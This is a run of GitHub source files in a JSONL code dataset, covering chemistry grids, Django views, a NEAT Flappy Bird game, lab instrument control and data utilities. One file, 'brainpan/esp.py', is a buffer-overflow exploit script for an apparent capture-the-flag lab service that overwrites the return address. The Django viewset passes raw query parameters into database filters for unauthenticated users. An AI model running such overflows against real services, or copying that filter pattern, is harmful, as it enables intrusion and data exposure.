self._axes[1])\n volume *= np.linalg.norm(self._shape[2] * self._axes[2])\n numpnt = 1.0 * self._npoints\n weights = np.full(self._npoints, volume / numpnt)\n\n elif method == 'R0':\n volume = np.linalg.norm((self._shape[0] + 1.0) * self._axes[0])\n volume *= np.linalg.norm((self._shape[1] + 1.0) * self._axes[1])\n volume *= np.linalg.norm((self._shape[2] + 1.0) * self._axes[2])\n\n numpnt = (self._shape[0] + 1.0) * (self._shape[1] + 1.0) * (self._shape[2] + 1.0)\n weights = np.full(self._npoints, volume / numpnt)\n\n else:\n raise ValueError('Argument method {0} is not known.'.format(method))\n return weights\n\n def integrate(self, data, method='R0'):\n \"\"\"\n Integrate the data on a cubic grid.\n\n Parameters\n ----------\n data : np.ndarray, shape=(npoints, m)\n Data at every point on the grid given as an array. The size of axis=0 of this array\n should equal the number of grid points.\n\n method : str, default='R0'\n The method for computing the integration weights at every point on the grid. Options:\n\n - 'R' method perfors rectangle/trapezoidal rule, without assuming that the function\n is close to zero at the edges of the grid.\n - 'R0' method performing rectangle/trapezoidal rule, assuming that the function is\n very close to zero at the edges of the grid.\n \"\"\"\n if data.shape[0] != self._npoints:\n raise ValueError('Argument data should have the same size as the grid for axis=0. ' +\n '{0}!={1}'.format(data.shape[0], self._npoints))\n value = np.tensordot(self.weights(method=method), data, axes=(0, 0))\n return value\n\n @staticmethod\n def _read_cube_header(fname):\n \"\"\"\n Return specifications of the cubic grid from the given cube file.\n\n Parameters\n ----------\n fname : str\n Cube file name with *.cube extension.\n \"\"\"\n with open(fname) as f:\n # skip the title\n f.readline()\n # skip the second line\n f.readline()\n\n def read_grid_line(line):\n \"\"\"Read a number and (x, y, z) coordinate from the cube file line.\"\"\"\n words = line.split()\n return (\n int(words[0]),\n np.array([float(words[1]), float(words[2]), float(words[3])], float)\n # all coordinates in a cube file are in atomic units\n )\n\n # number of atoms and origin of the grid\n natom, origin = read_grid_line(f.readline())\n # numer of grid points in A direction and step vector A, and so on\n shape0, axis0 = read_grid_line(f.readline())\n shape1, axis1 = read_grid_line(f.readline())\n shape2, axis2 = read_grid_line(f.readline())\n shape = np.array([shape0, shape1, shape2], int)\n axes = np.array([axis0, axis1, axis2])\n\n def read_coordinate_line(line):\n \"\"\"Read atomic number and (x, y, z) coordinate from the cube file line.\"\"\"\n words = line.split()\n return (\n int(words[0]), float(words[1]),\n np.array([float(words[2]), float(words[3]), float(words[4])], float)\n # all coordinates in a cube file are in atomic units\n )\n\n numbers = np.zeros(natom, int)\n pseudo_numbers = np.zeros(natom, float)\n coordinates = np.zeros((natom, 3), float)\n for i in range(natom):\n numbers[i], pseudo_numbers[i], coordinates[i] = read_coordinate_line(f.readline())\n # If the pseudo_number field is zero, we assume that no effective core\n # potentials were used.\n if pseudo_numbers[i] == 0.0:\n pseudo_numbers[i] = numbers[i]\n\n return numbers, pseudo_numbers, coordinates, origin, axes, shape\n","repo_name":"theochem/chemtools","sub_path":"chemtools/utils/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":15321,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"11971103838","text":"from django.core.mail import send_mail\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated, AllowAny, IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\nfrom courses.serializers import CourseNameSerializer\nfrom students.models import Student\nfrom students.paginations import CustomPagination\nfrom students.serializers import StudentSerializer\n\n\nclass StudentViewSet(ModelViewSet):\n serializer_class = StudentSerializer\n queryset = Student.objects.all()\n pagination_class = CustomPagination\n\n def create(self, request, *args, **kwargs):\n send_mail(\n 'Welcome to Academlo',\n 'Thanks '+request.data['name'],\n 'mares@academlo.com',\n [request.data['email']],\n fail_silently=False,\n )\n return super().create(request, *args, **kwargs)\n\n def get_queryset(self):\n data = {}\n for key, value in self.request.query_params.items():\n if key == CustomPagination.page_query_param:\n continue\n data[key] = value\n return self.queryset.filter(**data)\n\n def get_permissions(self):\n if self.request.method == 'GET':\n permissions = (AllowAny,)\n elif self.request.method == 'DELETE':\n permissions = (IsAdminUser,)\n else:\n permissions = (IsAuthenticated,)\n\n return [permission() for permission in permissions]\n\n @action(methods=['GET', 'POST', 'DELETE', 'PUT', 'PATCH'], detail=True)\n # ManyToManyField actions\n def course(self, request, pk):\n student = self.get_object()\n\n if request.method == 'GET':\n courses = student.courses.all()\n page = self.paginate_queryset(courses)\n if page:\n serialized = CourseNameSerializer(page, many=True)\n return self.get_paginated_response(serialized.data)\n\n serialized = CourseNameSerializer(student.courses, many=True)\n return Response(status=status.HTTP_200_OK, data=serialized.data)\n","repo_name":"jesusmares82-hub/entregable4","sub_path":"students/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37897267455","text":"import inspect\nimport os\n\nDIRECTION_FORWARDS = 'forwards'\nDIRECTION_REVERSE = 'reverse'\nDIRECTIONS = (DIRECTION_FORWARDS, DIRECTION_REVERSE)\n\n\nclass MigrationError(Exception):\n pass\n\n\nclass Migration:\n\n def __init__(self, depends_on, forwards, reverse):\n self.filename = os.path.splitext(os.path.basename(inspect.stack()[1].filename))[0]\n self.depends_on = depends_on\n self.forwards = forwards\n self.reverse = reverse\n\n def run(self, direction):\n if direction == DIRECTION_FORWARDS:\n self.forwards()\n elif direction == DIRECTION_REVERSE:\n self.reverse()\n else:\n raise MigrationError('Unknown direction')\n","repo_name":"Kelvedler/flask_app","sub_path":"src/elastic_migrations/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39604691045","text":"import socket\n\nfiller = (\"A\" * 524).encode('utf-8')\neip = b\"\\xf3\\x12\\x17\\x31\"\noffset = (\"C\" * 472).encode('utf-8')\nbuffer = (\"D\" * (1500 - len(filler) - len(eip) - len(offset))).encode('utf-8')\n\n#print(type(filler))\n#print(filler)\n#print(type(eip))\n#print(eip)\n\ninput = filler + eip + offset + buffer\n\n#input = input.encode(\"utf-8\")\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#s.connect((\"192.168.56.101\",9999))\ns.connect((\"192.168.130.10\",9999))\ns.send(input)\ns.close()\nprint(\"done\");","repo_name":"Twigonometry/buffer-overflow-scripts","sub_path":"brainpan/esp.py","file_name":"esp.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2023155702","text":"import pygame\nimport neat\nimport time\nimport os\nimport random\npygame.font.init()\n\nwindowWidth = 500\nwindowHeight = 800\n\ngeneration = 0\n\nbirdImages = [pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird1.png\"))), pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird2.png\"))), pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird3.png\")))]\npipeImage = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"pipe.png\")))\ngroundImage = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"base.png\")))\nbackgroundImage = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bg.png\")))\n\nstatFont = pygame.font.SysFont(\"comicsans\", 50)\n\n\nclass Bird:\n images = birdImages\n maxRotation = 25\n roationVelocity = 20\n animationTime = 5\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.tilt = 0\n self.tickCount = 0\n self.velocity = 0\n self.height = self.y\n self.imageCount = 0\n self.image = self.images[0]\n\n def jump(self):\n self.velocity = -10.5\n self.tickCount = 0\n self.height = self.y\n\n def move(self):\n self.tickCount += 1\n\n displacment = self.velocity * self.tickCount + 1.5 * self.tickCount ** 2\n\n if displacment >= 16:\n displacment = 16\n\n if displacment < 0:\n displacment -= 2\n\n self.y = self.y + displacment\n\n if displacment < 0 or self.y < self.height + 50:\n if self.tilt < self.maxRotation:\n self.tilt = self.maxRotation\n else:\n if self.tilt > -90:\n self.tilt -= self.roationVelocity\n\n def draw(self, window):\n self.imageCount += 1\n\n if self.imageCount < self.animationTime:\n self.image = self.images[0]\n elif self.imageCount < self.animationTime * 2:\n self.image = self.images[1]\n elif self.imageCount < self.animationTime * 3:\n self.image = self.images[2]\n elif self.imageCount < self.animationTime * 4:\n self.image = self.images[1]\n elif self.imageCount < self.animationTime * 4 + 1:\n self.image = self.images[0]\n self.imageCount = 0\n\n if self.tilt <= -80:\n self.image = self.images[1]\n self.imageCount = self.animationTime * 2\n\n rotatedImage = pygame.transform.rotate(self.image, self.tilt)\n newRectangle = rotatedImage.get_rect(center=self.image.get_rect(topleft = (self.x, self.y)).center)\n window.blit(rotatedImage, newRectangle.topleft)\n\n def get_mask(self):\n return pygame.mask.from_surface(self.image)\n\n\nclass Pipe:\n gap = 200\n velocity = 5\n\n def __init__(self, x):\n self.x = x\n self.height = 0\n\n self.top = 0\n self.bottom = 0\n self.pipeTop = pygame.transform.flip(pipeImage, False, True)\n self.pipeBottom = pipeImage\n\n self.passed = False\n self.set_height()\n\n def set_height(self):\n self.height = random.randrange(50, 450)\n self.top = self.height - self.pipeTop.get_height()\n self.bottom = self.height + self.gap\n\n def move(self):\n self.x -= self.velocity\n\n def draw(self, window):\n window.blit(self.pipeTop, (self.x, self.top))\n window.blit(self.pipeBottom, (self.x, self.bottom))\n\n def collid(self, bird):\n birdMask = bird.get_mask()\n topMask = pygame.mask.from_surface(self.pipeTop)\n bottomMask = pygame.mask.from_surface(self.pipeBottom)\n\n topOffset = (self.x - bird.x, self.top - round(bird.y))\n bottomOffset = (self.x - bird.x, self.bottom - round(bird.y))\n\n bottomPoint = birdMask.overlap(bottomMask, bottomOffset)\n topPoint = birdMask.overlap(topMask, topOffset)\n\n if bottomPoint or topPoint:\n return True\n return False\n\n\nclass Ground:\n velocity = 5\n width = groundImage.get_width()\n image = groundImage\n\n def __init__(self, y):\n self.y = y\n self.x1 = 0\n self.x2 = self.width\n\n def move(self):\n self.x1 -= self.velocity\n self.x2 -= self.velocity\n\n if self.x1 + self.width < 0:\n self.x1 = self.x2 + self.width\n\n if self.x2 + self.width < 0:\n self.x2 = self.x1 + self.width\n\n def draw(self, window):\n window.blit(self.image, (self.x1, self.y))\n window.blit(self.image, (self.x2, self.y))\n\n\n\ndef draw_window(window, birds, pipes, ground, score, generation, numberOfBirds):\n window.blit(backgroundImage, (0, 0))\n\n for pipe in pipes:\n pipe.draw(window)\n\n text = statFont.render(\"Score: \" + str(score), 1, (255, 255, 255))\n window.blit(text, (windowWidth - 10 - text.get_width(), 10))\n\n text = statFont.render(\"Generation: \" + str(generation), 1, (255, 255, 255))\n window.blit(text, (10, 10))\n\n text = statFont.render(\"Number of Birds: \" + str(numberOfBirds), 1, (255, 255, 255))\n window.blit(text, (10, 50))\n\n ground.draw(window)\n\n for bird in birds:\n bird.draw(window)\n\n pygame.display.update()\n\n\ndef main(genomes, config):\n global generation\n generation += 1\n numberOfBirds = 15\n\n nets = []\n ge = []\n birds = []\n\n for _, genome in genomes:\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n nets.append(net)\n birds.append(Bird(230, 350))\n genome.fitness = 0\n ge.append(genome)\n\n ground = Ground(730)\n pipes = [Pipe(600)]\n window = pygame.display.set_mode((windowWidth, windowHeight))\n clock = pygame.time.Clock()\n\n score = 0\n\n run = True\n while run:\n clock.tick(30)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n quit()\n\n pipeIndex = 0\n if len(birds) > 0:\n if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].pipeTop.get_width():\n pipeIndex = 1\n else:\n run = False\n break\n\n for x, bird in enumerate(birds):\n bird.move()\n ge[x].fitness += 0.1\n\n output = nets[birds.index(bird)].activate((bird.y, abs(bird.y - pipes[pipeIndex].height), abs(bird.y - pipes[pipeIndex].bottom)))\n\n if output[0] > 0.5:\n bird.jump()\n\n addPipe = False\n remove = []\n for pipe in pipes:\n for x, bird in enumerate(birds):\n if pipe.collid(bird):\n ge[x].fitness -= 1\n birds.pop()\n nets.pop()\n ge.pop()\n numberOfBirds -= 1\n\n if not pipe.passed and pipe.x < bird.x:\n pipe.passed = True\n addPipe = True\n\n if pipe.x + pipe.pipeTop.get_width() < 0:\n remove.append(pipe)\n\n pipe.move()\n\n if addPipe:\n score += 1\n for genome in ge:\n genome.fitness += 5\n pipes.append(Pipe(600))\n\n for r in remove:\n pipes.remove(r)\n\n for x, bird in enumerate(birds):\n if bird.y + bird.image.get_height() >= 730 or bird.y < 0:\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n numberOfBirds -= 1\n\n ground.move()\n draw_window(window, birds, pipes, ground, score, generation, numberOfBirds)\n\n\ndef run(configPath):\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, configPath)\n\n population = neat.Population(config)\n\n population.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n population.add_reporter(stats)\n\n winner = population.run(main, 50)\n\n\nif __name__ == \"__main__\":\n local_dir = os.path.dirname(__file__)\n configPath = os.path.join(local_dir, 'config-feedforward.txt')\n run(configPath)\n\n","repo_name":"drinik618/Flappy-Bird","sub_path":"flappyBird.py","file_name":"flappyBird.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14350390009","text":"\"\"\"useful things\n\"\"\"\nimport numpy as np\nfrom sympy.combinatorics import Permutation\nimport sympy\n\n\n###############################\n### Standard form of a code ###\n###############################\n\n\ndef find_next_pivot(matrix_stab, j, n, rx):\n \"\"\"find next pivot position\n \"\"\"\n for kp in range(j, n):\n for jp in range(j, rx):\n if matrix_stab[jp, kp] != 0:\n return (jp, kp)\n return (-1, -1)\n\n\ndef standard_form(matrix_stab_in, n, rx):\n \"\"\"put matrix_stab in standard form\n \"\"\"\n matrix_stab = np.array(matrix_stab_in, dtype='uint8')\n qubitpermutation = Permutation([], size=n)\n\n for j in range(rx):\n jp, kp = find_next_pivot(matrix_stab, j, n, rx)\n if jp == -1:\n break\n if j != jp:\n perm = Permutation([[j, jp]], size=rx)\n matrix_stab = matrix_stab[np.array([i^perm for i in range(rx)]), :]\n if j != kp:\n perm = Permutation([[j, kp]], size=n)\n matrix_stab = matrix_stab[:, np.array([i^perm for i in range(n)])]\n qubitpermutation = qubitpermutation*perm\n\n for l in range(j+1, rx):\n if matrix_stab[l, j] == 1:\n matrix_stab[l, :] = (matrix_stab[l, :] + matrix_stab[j, :]) % 2\n\n for l in range(j-1, 0, -1):\n for j in range(l):\n if matrix_stab[j, l] == 1:\n matrix_stab[j, :] = (matrix_stab[j, :] + matrix_stab[l, :]) % 2\n\n return matrix_stab, qubitpermutation\n\n\n############################\n### Bravyi Haah matrices ###\n############################\n\nZERO = sympy.GF(2).zero\nONE = sympy.GF(2).one\n\nLMAT = sympy.Matrix([[ZERO, ZERO, ZERO, ZERO, ONE, ONE, ONE, ONE],\n [ZERO, ZERO, ZERO, ZERO, ONE, ONE, ONE, ONE]])\n\nMMAT = sympy.Matrix([[ONE, ONE, ONE, ZERO, ZERO, ZERO],\n [ZERO, ZERO, ZERO, ONE, ONE, ONE]])\n\nS1MAT = sympy.Matrix([[ZERO, ONE, ZERO, ONE, ZERO, ONE, ZERO, ONE],\n [ZERO, ZERO, ONE, ONE, ZERO, ZERO, ONE, ONE],\n [ONE, ONE, ONE, ONE, ONE, ONE, ONE, ONE]])\n\nS2MAT = sympy.Matrix([[ONE, ZERO, ONE, ONE, ZERO, ONE],\n [ZERO, ONE, ONE, ZERO, ONE, ONE],\n [ZERO, ZERO, ZERO, ZERO, ZERO, ZERO]])\n\ndef bravyi_haah_gmat(k):\n \"\"\"Tri-orthogonal matrix from Bravyi-Haah\n \"\"\"\n bigl = np.block([[LMAT] for _ in range(k)]+ [[S1MAT]])\n bigm = sympy.diag(*[MMAT for _ in range(k)])\n bigs2 = np.block([S2MAT for _ in range(k)])\n gmatr = np.block([[bigm], [bigs2]])\n gmat = np.block([bigl, gmatr])\n return sympy.Matrix(gmat)\n\ndef bravyi_haah_stabx(k):\n \"\"\"X-stabilizer matrix from Bravyi-Haah\n \"\"\"\n return np.block([S1MAT] + [S2MAT for _ in range(k)])\n\ndef bravyi_haah_stabz(k):\n \"\"\"Z-stabilizer matrix from Bravyi-Haah\n \"\"\"\n gmat = bravyi_haah_gmat(k)\n gorth = np.array([g.transpose() for g in gmat.nullspace()], dtype='uint8') % 2\n return gorth\n","repo_name":"eddieschoute/circuit-benchmarks","sub_path":"circuit_benchmarks/distillutils.py","file_name":"distillutils.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"14818275264","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = [\n url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^', include('homepage.urls')),\n url(r'^coursesessions/', include('coursesessions.urls')),\n url(r'^polls/', include('polls.urls')),\n url(r'^api/polls/', include('polls.api.urls')),\n url(r'^api/sessions/', include('coursesessions.api.urls')),\n]\n\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"s-wirth/thesis","sub_path":"thesis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30825800726","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: gryu\r\n\"\"\"\r\n\r\nimport serial\r\nimport numpy as np\r\n\r\n\r\nclass Keithley_2400():\r\n def __init__(self, port, baudrate, parity=serial.PARITY_NONE, bytesize=8, stopbits=1, timeout=1e-1, command_list=[]):\r\n self.port = port\r\n self.baudrate = baudrate\r\n self.parity = parity\r\n self.bytesize = bytesize\r\n self.stopbits = stopbits\r\n self.timeout = timeout\r\n self.command_list = command_list\r\n\r\n if not self._is_on():\r\n raise Exception('No response from Keithley... '\\\r\n 'Check if it is ON '\\\r\n 'or RESTART !!!') \r\n \r\n def _is_on(self):\r\n with serial.Serial(self.port, self.baudrate, self.timeout) as ser_keithley:\r\n ser_keithley.write(b'*RST\\r')\r\n ser_keithley.write(b':STAT:MEAS?\\r')\r\n response_state = ser_keithley.readline()\r\n ser_keithley.close()\r\n return response_state\r\n \r\n # =============================================================================\r\n # Scan given single fixed voltage.\r\n # \r\n # TODO: RAISE EXCEPTION AND CLOSE SERIAL PORT IF ANY WRITE FAILURE OCCUR,\r\n # TO PREVENT `SerialException` ERROR.\r\n #\r\n # See:\r\n # https://github.com/charkster/keithley_2308\r\n # https://stackoverflow.com/questions/53882152/how-to-merge-f-string-with-b-string-in-one-line-usage-in-python\r\n # =============================================================================\r\n def single_scan(self, voltage):\r\n fixed_voltage = str(voltage)\r\n raw_data = \"\"\r\n\r\n with serial.Serial(self.port, self.baudrate, self.parity, self.bytesize, self.stopbits, self.fixed_voltage) as ser_keithley:\r\n for command in self.command_list:\r\n command = command.encode('utf-8')\r\n if command == \":SOUR:VOLT:LEV {0}\\r\":\r\n command.format(fixed_voltage)\r\n if command == \":OUTP OFF\\r\":\r\n raw_data = ser_keithley.read(28) ## byte string output len is 28\r\n # sleep(10)\r\n ser_keithley.write(command)\r\n \r\n values = [float(i) for i in raw_data.decode('utf-8').strip().split(',')]\r\n voltage = values[0]\r\n current = values[1]\r\n ser_keithley.close()\r\n return voltage, current\r\n\r\n\r\n # =============================================================================\r\n # Incremental scan from start to stop voltage every fixed step.\r\n # =============================================================================\r\n def incr_scan(self, start_v, stop_v, v_step, nplc, hys=False):\r\n raw_data = \"\"\r\n num_of_read = 0\r\n value_lists = []\r\n v_list, c_list = [], []\r\n\r\n if (stop_v - start_v) * v_step < 0:\r\n v_step = -v_step\r\n print(\"Swapping v_step polarity + <--> -\")\r\n trigger_count = int(1 + (stop_v - start_v) / v_step)\r\n num_of_read = 28 * trigger_count\r\n\r\n with serial.Serial(self._keith_com,self._baudrate) as ser_keithley:\r\n for command in self.command_list:\r\n command = command.encode('utf-8')\r\n\r\n if command == \":READ?\\r\":\r\n raw_data = ser_keithley.read(num_of_read)\r\n #Convert read values to float number and separate to voltage and current\r\n value_lists = [[float(i) for i in \r\n raw_data.decode('ascii').strip().split(',')]]\r\n \r\n if hys:\r\n ser_keithley.write(b':SOUR:SWE:DIR DOWN\\r')\r\n ser_keithley.write(b':READ?\\r')\r\n raw_data = ser_keithley.read(num_of_read)\r\n value_lists += [[float(i) for i in \r\n raw_data.decode('ascii').strip().split(',')]]\r\n\r\n ser_keithley.write(command)\r\n\r\n for value in value_lists:\r\n v_list.append(np.array(value[::2]))\r\n c_list.append(np.array(value[1::2]) * 1e3)\r\n return v_list, c_list\r\n\r\n\r\n\r\n\r\n## TODO: RAISE EXCEPTION AND CLOSE SERIAL PORT IF ANY WRITE FAILURE OCCUR,\r\n## TO PREVENT `SerialException` ERROR.\r\ndef keithley(voltage):\r\n voltf = float(voltage)\r\n #voltfe = str(voltf).encode('utf-8')\r\n ser_keithley = serial.Serial(port=\"COM7\", baudrate=38400, parity=serial.PARITY_NONE, bytesize=8, stopbits=1)\r\n \r\n ser_keithley.write(b\"*RST\\r\") #Reset Keithley\r\n ser_keithley.write(b\":SOUR:FUNC VOLT\\r\") #Set Voltage as SOURCE\r\n ser_keithley.write(b\":SOUR:VOLT:MODE FIXED\\r\") #Fixed Voltage\r\n ser_keithley.write(b\":SOUR:VOLT:LEV %f\\r\" % voltf) #Set Voltage from request\r\n #ser_keithley.write(b\":SOUR:VOLT:LEV \" + voltfe + \"\\r\")\r\n #voltf_fixed = bytes(\":SOUR:VOLT:LEV {0}\\r\".format(voltf))\r\n # ser_keithley.write(bytes(\":SOUR:VOLT:LEV {0}\\r\".format(voltf), encoding='utf8'))\r\n\r\n ser_keithley.write(b':SENS:FUNC \"CURRENT\"\\r') #Set Current as SENSOR\r\n ser_keithley.write(b':FORM:ELEM VOLT, CURR\\r') #Retrieve Voltage and Current only \r\n ser_keithley.write(b':SENS:VOLT:PROT 5\\r') #Cmpl voltage in Volt\r\n ser_keithley.write(b':SENS:CURR:PROT 0.5\\r') #Cmpl current in Ampere\r\n ser_keithley.write(b':SENS:CURR:NPLC 0.1\\r') #AC noise integrating time\r\n ser_keithley.write(b':OUTP ON\\r')\r\n ser_keithley.write(b':READ?\\r')\r\n \r\n raw_data = ser_keithley.read(28)\r\n\r\n ser_keithley.write(b':OUTP OFF\\r')\r\n \r\n values = [float(i) for i in raw_data.decode('utf-8').strip().split(',')]\r\n voltage = values[0]\r\n current = values[1]\r\n ser_keithley.close()\r\n return voltage, current\r\n\r\ndef Minolta():\r\n import serial\r\n\r\n ser_minolta = serial.Serial(port=\"COM5\", baudrate=4800, parity=serial.PARITY_EVEN, bytesize=7, stopbits=2)\r\n\r\n # setting_var = b'\\MDS02\\r\\n'\r\n message = b'\\MES\\r\\n'\r\n # ser_minolta.write(setting_var)\r\n ser_minolta.write(b'\\CLE\\r\\n')\r\n ser_minolta.write(message)\r\n raw_data = ser_minolta.read(11) #11 bits received\r\n\r\n # print(luminance)\r\n luminance = raw_data.decode('ascii')\r\n print('Luminance = ', luminance[4:-1], 'cd/m2')\r\n ser_minolta.close()\r\n \r\n return luminance[4:-2]\r\n\r\n\r\n# baudrate:\r\n# 38400 -- ph-splsim lab\r\n# 19200 -- ls-100 lab\r\nfor i in range(-12,13):\r\n voltage = i/10\r\n print(keithley(voltage))\r\n #print(\"voltf {0}\".format(voltage))\r\n #Minolta()\r\n #time.sleep(0.1)\r\n","repo_name":"euteryu/minolta-ls-100-luminance","sub_path":"src/old_keithley_minolta.py","file_name":"old_keithley_minolta.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16375723394","text":"\"\"\"\nMain entrypoint for game\n\"\"\"\nimport pygame\nimport settings\n\n\nclass Game:\n \"\"\"Representation of the Game itself\"\"\"\n def __init__(self):\n \"\"\"\n initialize pygame and create window\n \"\"\"\n pygame.init()\n #pygame.mixer.init() # for sound\n self.screen = pygame.display.set_mode((settings.WIDTH, settings.HEIGHT))\n pygame.display.set_caption(settings.TITLE)\n self.clock = pygame.time.Clock()\n\n\n\n def set_player_movement(self):\n \"\"\"\n Update any player movement here\n \"\"\"\n\n def start_game(self):\n \"\"\" Game Loop \"\"\"\n running = True\n while running:\n self.clock.tick(30)\n\n # Process input (events)\n for event in pygame.event.get():\n # check for closing window\n if event.type == pygame.QUIT:\n running = False\n\n # Update\n self.set_player_movement()\n #keys = pygame.key.get_pressed()\n #if keys[pygame.K_LEFT]:\n # pass\n # Render\n self.screen.fill(settings.Colors.BLACK)\n pygame.display.update()\n pygame.quit()\nif __name__ == \"__main__\":\n GAME = Game()\n GAME.start_game()\n","repo_name":"RAshkettle/pygame_template","sub_path":"game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40393401734","text":"from sklearn.base import BaseEstimator, TransformerMixin\nimport pandas as pd\nimport numpy as np\nimport random\nimport time\nimport itertools\nfrom functools import wraps\nfrom multiprocessing import Pool\n# import ipdb\n\nclass AutoCombine(BaseEstimator, TransformerMixin):\n '''多进程k阶类别特征组合'''\n def __init__(self, cols, order, null_value, num_process, verbose, max_comb=4000):\n super().__init__()\n self.cols = cols\n self.order = order\n self.col_dicts = {}\n self.null_value = null_value\n self.combine_list = [i for i in itertools.combinations(cols, order)]\n self.verbose=verbose\n if len(self.combine_list)>max_comb:\n print('clip since reach max_comb:{}/{}'.format(len(self.combine_list), max_comb))\n self.combine_list = random.sample(self.combine_list, max_comb)\n else:\n print('totally {} combinations'.format(len(self.combine_list)))\n self.num_process=num_process\n if num_process!=None:\n self.sub_len = len(self.combine_list)//num_process+1\n self.sub_comb_list = [self.combine_list[x:x+self.sub_len] for x in range(0, len(self.combine_list), self.sub_len)]\n\n \n def _fit(self, x, combine_list):\n DF = pd.DataFrame()\n col_dicts={}\n for idx, col_names in enumerate(combine_list):\n new_name = 'comb('+','.join(col_names)+')'\n length=len(combine_list)\n if length!=1 and idx%(length//2)==0 and self.verbose==1:\n print('processing col: {}, {}/{}'.format(new_name, idx, length))\n DF[new_name] = (x[list(col_names)].astype(str)+'|').sum(axis=1)\n col_dicts[new_name] = DF[new_name].unique()\n return DF, col_dicts\n \n def fit(self, x, y=None):\n st = time.time()\n if self.num_process:\n print('------------------------{}-{}----------------------------'.format(self.__class__.__name__, 'fit()'))\n print('program is going to use multiprocessing with {} Ps'.format(self.num_process))\n p = Pool(self.num_process)\n rst = []\n for i in range(self.num_process): \n if i>len(self.sub_comb_list)-1: # 防止workers>len(sub_comb_list)报错\n print('num_works should be at most: {}'.format(self.sub_len))\n a = p.apply_async(self._fit, args=(x, self.sub_comb_list[i])) \n rst.append(a) \n p.close()\n p.join()\n new_x=rst[0].get()[0]\n for i in rst[1:]:\n new_x=new_x.join(i.get()[0])\n list_dic = [i.get()[1] for i in rst]\n for d in list_dic:\n self.col_dicts.update(d)\n else:\n new_x, col_dicts = self._fit(x, self.combine_list)\n self.col_dicts =col_dicts\n \n print('------------------------use:{} s----------------------------'.format(time.time()-st))\n return self\n \n def _transform(self, x, combine_list):\n DF = pd.DataFrame()\n for idx, col_names in enumerate(combine_list):\n new_name = 'comb('+','.join(col_names)+')'\n length = len(combine_list)\n if length!=1 and idx%(length//2)==0 and self.verbose==1:\n print('processing col: {}, {}/{}'.format(new_name, idx, length))\n tra_unique = self.col_dicts[new_name]\n# ipdb.set_trace()\n DF[new_name] = (x[list(col_names)].astype(str)+'|').sum(axis=1)\n # 凡是 test中存在, train中不存在的,变为null\n DF[new_name][~DF[new_name].isin(tra_unique)] = self.null_value\n return DF\n \n def transform(self, x):\n if self.num_process:\n st = time.time()\n print('------------------------{}-{}----------------------------'.format(self.__class__.__name__, 'transform()'))\n print('program is going to use multiprocessing with {} Ps'.format(self.num_process))\n p2 = Pool(self.num_process)\n rst = []\n for i in range(self.num_process):\n if i>len(self.sub_comb_list)-1:\n print('num_works should be at most: {}'.format(self.sub_len))\n aa = p2.apply_async(self._transform, args=(x, self.sub_comb_list[i])) \n rst.append(aa) \n p2.close()\n p2.join()\n new_x = pd.concat([i.get() for i in rst], axis=1)\n print('------------------------use:{} s----------------------------'.format(time.time()-st))\n return new_x\n else:\n print('will not use multi processing')\n return self._transform(x, self.combine_list)\n \n \nif __name__ == '__main__':\n data_path = './data'\n # test.csv train.csv train_target.csv\n tra_x = pd.read_csv(data_path + '/train.csv')\n tra_y = pd.read_csv(data_path + '/train_target.csv')\n final = tra_x.merge(tra_y,on='id')\n final['dist']= final.dist.apply(lambda x: int(x/100))\n random.seed(1)\n tra_id = set(random.sample(range(final.shape[0]),70000))\n val_id = set(range(final.shape[0])) - tra_id\n tra_id = [i for i in tra_id]\n val_id = [i for i in val_id]\n Train = final.iloc[tra_id,:]\n Valid = final.iloc[val_id,:]\n tra_x, tra_y = Train.drop('target', axis=1), Train.target\n val_x, val_y = Valid.drop('target', axis=1), Valid.target\n zz = tra_x.apply(lambda x: 